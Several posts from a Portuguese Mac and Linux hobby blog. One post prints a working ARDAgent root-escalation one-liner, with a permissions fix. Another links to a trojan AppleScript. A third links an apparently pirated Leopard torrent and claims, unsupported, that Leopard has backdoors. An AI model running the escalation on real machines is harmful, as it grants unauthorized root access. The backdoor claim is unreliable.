Blog Nerd do Liquuid

A Apple quer ser a nova Microsoft ?



Papo sério, hoje saiu uma atualização de segurança para o OSX Leopard ,porém nada de resolver as permissões do ARDAgent . Ok , virou palhaçada ! Os caras vendem um sistema operacional com uma falha de segurança que torna o OSX tão seguro quanto o Windows 95 e não tem a manha de corrigir !!!

Quando o leopard foi lançado muita gente reclamava de alguns warnings que apareciam durante a correção de permissões, um deles era o do ARDAgent, qual foi a solução da Apple ? Incorporar a permissão bugada ao sistema, assim eliminando os warnings e reativando o campo de distorção da realidade.

Não é possível que a Apple não tenha interesse em resolver esse problema, só pra ter uma idéia do potencial do bug, ele permite que qualquer usuário local instale um trojan no sistema, sendo administrador ou não. Já tem alguns trojans circulando web a fora. O Leopard sempre pergunta se você quer realmente abrir um programa que foi baixado da internet, mostrando inclusive a data e o site de onde o arquivo veio, o que evita trojans como aqueles do windows que são trojans disfarçados de imagens e vídeos, mas e no Tiger ? Dizem que a falha também esta presente na versão anterior.

E o pior, tem imbecis na comunidade macmaniaca que tentam minimizar a falha, inclusive pedindo pra alguém provar que esses trojans realmente funcionam e desafiando os leitores do fórum a invadir suas máquinas.

Passei um dia da minha vida estudando Xcode e produzindo um pequeno malware disfarçado de vídeo quicktime, mas a implementação a seguir é mais eficiente , modifique à vontade, é um applescript, é só compilar: clique aqui


2 comentários

TAGS : mac osx leopard tiger fiasco trojan ardagent security hacker

firefox 3 no leopard



Toda vez que eu abro o ff3 no leopard ele abre assim :

Firefox 3 no Leopard

saco !


3 comentários

TAGS : firefox leopard glitch

Ownando um MAC OS X Leopard com um comando



Dizem que o OSX é mais seguro que a concorrência, acho que não :) Abra um terminal e digite :


osascript -e 'tell app "ARDAgent" to do shell script "whoami"'

Isso mesmo, troque o whoami por qualquer outro comando e execute como root .

Agora vamos resolver o problema e eliminar a ameaça :



sudo chmod u-s /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent 

Mas não vale Reparar as permissões , ou ele volta com a falha de segurança !!!


8 comentários

TAGS : leopard hacker hahaha

Snow Leopard



A apple anunciou o Snow Leopard , aka: MAC OSX 10.6. O sistema aparentemente será robusto, vai trazer a tecnologias novas como OpenCL , que permite usar a GPU como co-processador, ZFS etc... Ele vai suportar também o Microsoft Exchange, multiplos processadores, sistema totalmente 64bits etc...

Mas o Jobs deu uma dica boa... Ao anunciar o novo sistema disse que ele terá binários menores, menor consumo de memória, ou seja, seria o fim dos binários universais ? Acho que sim, olha só o que chegou pros developers:

noppc

É a pá de cal nos macs PPC :(


2 comentários

TAGS : snow leopard apple microsoft exchage zfs 64bit ppc

Gentoo no MacBook PRO, parte 1



Faz um tempinho que estou preparando meu macbook pro para receber o gentoo. O grande problema não é o hardware em si, mas o fato de que eu gosto muito do leopard, e meu HD é ridiculamente pequeno, apenas 100 Gb.

O desafio é simples, instalar o gentoo 2007.0, usand um cd de instalação do SuSE 10.3, em um HD externo USB, sendo que essa máquina não pode ficar fora do ar durante todo o processo. A solução é compilar o gentoo que será instalado no macbook pro a partir do meu fabuloso AMD64 3000+ que tem instalado o gentoo x64.

No seu linux favorito pegue o stage3 da versão i686 do gentoo :



wget http://www.las.ic.unicamp.br/pub/gentoo/releases/x86/2007.0/stages/stage3-x86-2007.0.tar.bz2


Agora você vai precisar dos seus superpoderes de root, para descompactar o stage3 de modo correto:


su -
mkdir gentoo
cd gentoo
tar -xjvpf stage3-x86-2007.0.tar.bz2

Agora nos precisamos configurar os diretórios virtuais /dev e /proc dentro do nosso novo sistema :


mount -o bind /dev/ dev/
mount -o bind /proc/ proc

Vamos copiar o arquivo resolv.conf e finalmente usar o sistema novo usando o chroot :

cp /etc/resolv.conf etc
chroot . /bin/bash

Dentro do novo sistema vamos popular a árvore do portage e atualizar o sistema, com os comando :



emerge --sync
emerge -u world

Calculating world dependencies... done!

!!! Error: the sys-apps/portage-2.1.4_rc1 package conflicts with another package;
!!!        the two packages cannot be installed on the same system together.
!!!        Please use 'emerge --pretend' to determine blockers.

For more information about Blocked Packages, please refer to the following
section of the Gentoo Linux x86 Handbook (architecture is irrelevant):

http://www.gentoo.org/doc/en/handbook/handbook-x86.xml?full=1#blocked


Ooops ! Algo deu errado ! Como o portage é muito mais recente que o stage3 temos conflitos na resolução e pacotes. Para resolver o problema vamos usar os comandos :



emerge --nodeps portage
emerge bash

E com isso encerro essa primeira parte da saga !


0 comentários

TAGS : gentoo macbook pro leopard 2007.0 usb amd64 stage3

Mac OS X pisa na bola



Eu sou um entusiasta do sistema da apple , e o Leopard me deixou tão satisfeito que não tive coragem até agora de particionar o HD do meu macbook pro pra instalar linux. O sistema praticamente não da trabalho, um update aqui e ali, raros travamentos, desempenho razoavel (linux assasina o OSX quando o assunto é desempenho e bateria), mas quando resolve me pentelhar faz bem feito.

Já formatei meu notebook 3 vezes, uma quando comprei, outra quando notei que após 3 migrações de notebooks estavam fazendo mal ao meu sistema ( do ibook pro powerbook e agora pro macbook), e agora por problemas com Utter Crap HFS .

Quando fiz o segundo format eu notei que meu sistema antigo estava configurado para ser Case-Insensitive, ou seja "Isso==iSSo". Como minha escola é Unix pra mim nada mais natural do que usar um sistema Case-Sensitive onde "iSSo é diferende de IssO", pena que os desenvolvedores de software pra plataforma não sabem disso. Logo após restaurar minhas tralhas do backup notei que meu Warcraft III - TFT não tava mais rolando, reclamava de arquivos faltando, fui corrigindo o case dos nomes dos arquivos um por um, e quando notei que eram centenas, fiz um script mas foi inútil pois a Engine do jogo não segue um padrão ao chamar os arquivos.... A minha solução foi criar uma imagem de disco Case- Insensitive e botar o game dentro. Deu certo, e a vida continuou.

Nas crises da vida, notei que se eu quiser ter um futuro conjulgal terei que lidar menos com a máquina e mais com sentimentos, emoções e arte. Então decidi voltar a desenhar e tentar a sorte profissionalmente no médio prazo... Então nada mais natural do que dominar as ferramentas básicas padrão do mercado. Domino bem o Gimp e o Inkscape, e sei que eles tem limites, mas nunca instalei um illustrator ou photoshop na vida e sei que eles tem virtudes. Após um interminavel download do site da Adobe quando fui instalar a versão Trial do Flash :

Pra não cair no problema do Warcraft a Adobe simplesmente limou o suporte ao HFS Case-sensitive, pensei comigo que seria possível usar a mesma estratégia do Warcraft, criando uma imagem de disco e jogando tudo dentro... Errei ! Tive que reformatar meu HD usando Case Insensitive pra evitar futuros problemas. O problema não tem outra solução, e segundou alguns MacAcos velhos que conheço esse tipo de incompatibilidade sempre rolou.

É como eu disse, quase não da trabalho, mas quando da normalmente é perda total :P


0 comentários

TAGS : mac osx apple leopard macbook pro linux illustrator photoshop warcraft III the frozen throne gimp inkscape

Compartilhando wifi com Leopard



Ok, parece ridículo, mas levei 2 horas pra descobrir que compartilhar rede usando o Leopard é ridículamente simples, mais fácil que no Tiger. Então vamos lá : System Prefs > Sharing > Internet Sharing, escolha o wifi como fonte de internet, e marque os dispositivos que serão beneficiados com a rede, ou seja, firewire, ethernet, bluetooh etc...
Apó essa configuração as máquinas clientes devem ser configuradas pegar o IP por DHCP.

Eu demorei tudo isso, simplesmente porque no linux além de usar os comandinhos básicos normalmente os ips do cliente são criados estaticamente, ou seja, eu estava configurando os clientes para uma rede que não existia.... Só depois vi que o Leopard cria automaticamente os aliases nos devices e de quebra levanda um mini-dhcp server para os clientes...


0 comentários

TAGS : leopard internet sharing hahaha linux wifi

Leopard num PC



Estou usando o leopard, é sem dúvida o melhor sistema que já usei, 5 anos na frente que o vista e o linux em um monte de aspectos que vou postar nesse blog algum dia, seguem os links pra quem quiser se aventurar :

http://www.mininova.org/tor/968462

http://forum.osx86scene.com/viewtopic.php?f=16&t=2008&st=0&sk=t&sd=a
http://dailyapps.net/2007/10/hack-attack-install-leopard-on-your-pc-in-3-easy-steps/


A apple é tosca mas veja hoje o que os outros sistemas vão ter daqui a alguns anos, teste o leopard :)

PS: Mac Os X Leopard é um sistema operacional proprietário que provavelmente é cheio de backdoors ,e deve espionar seus usuários assim como o iphone faz



0 comentários

TAGS : apple mac osx leopard

Posts relacionados

Delicious/liquuid/leopard
Modified BOOT-132 enables vanilla install from retail Leopard - InsanelyMac Forum
A Apple quer ser a nova Microsoft ? :: blog do liquuid
macosxhints.com - Two ways to possibly close an ARDAgent security hole
Ownando um MAC OS X Leopard com um comando :: blog do liquuid
Snow Leopard :: blog do liquuid
Apple lança Guia de Configuração de Segurança para o Mac OS X 10.5 Leopard
Gentoo no MacBook PRO, parte 1 :: blog do liquuid
liquuid's post :: Leopard num PC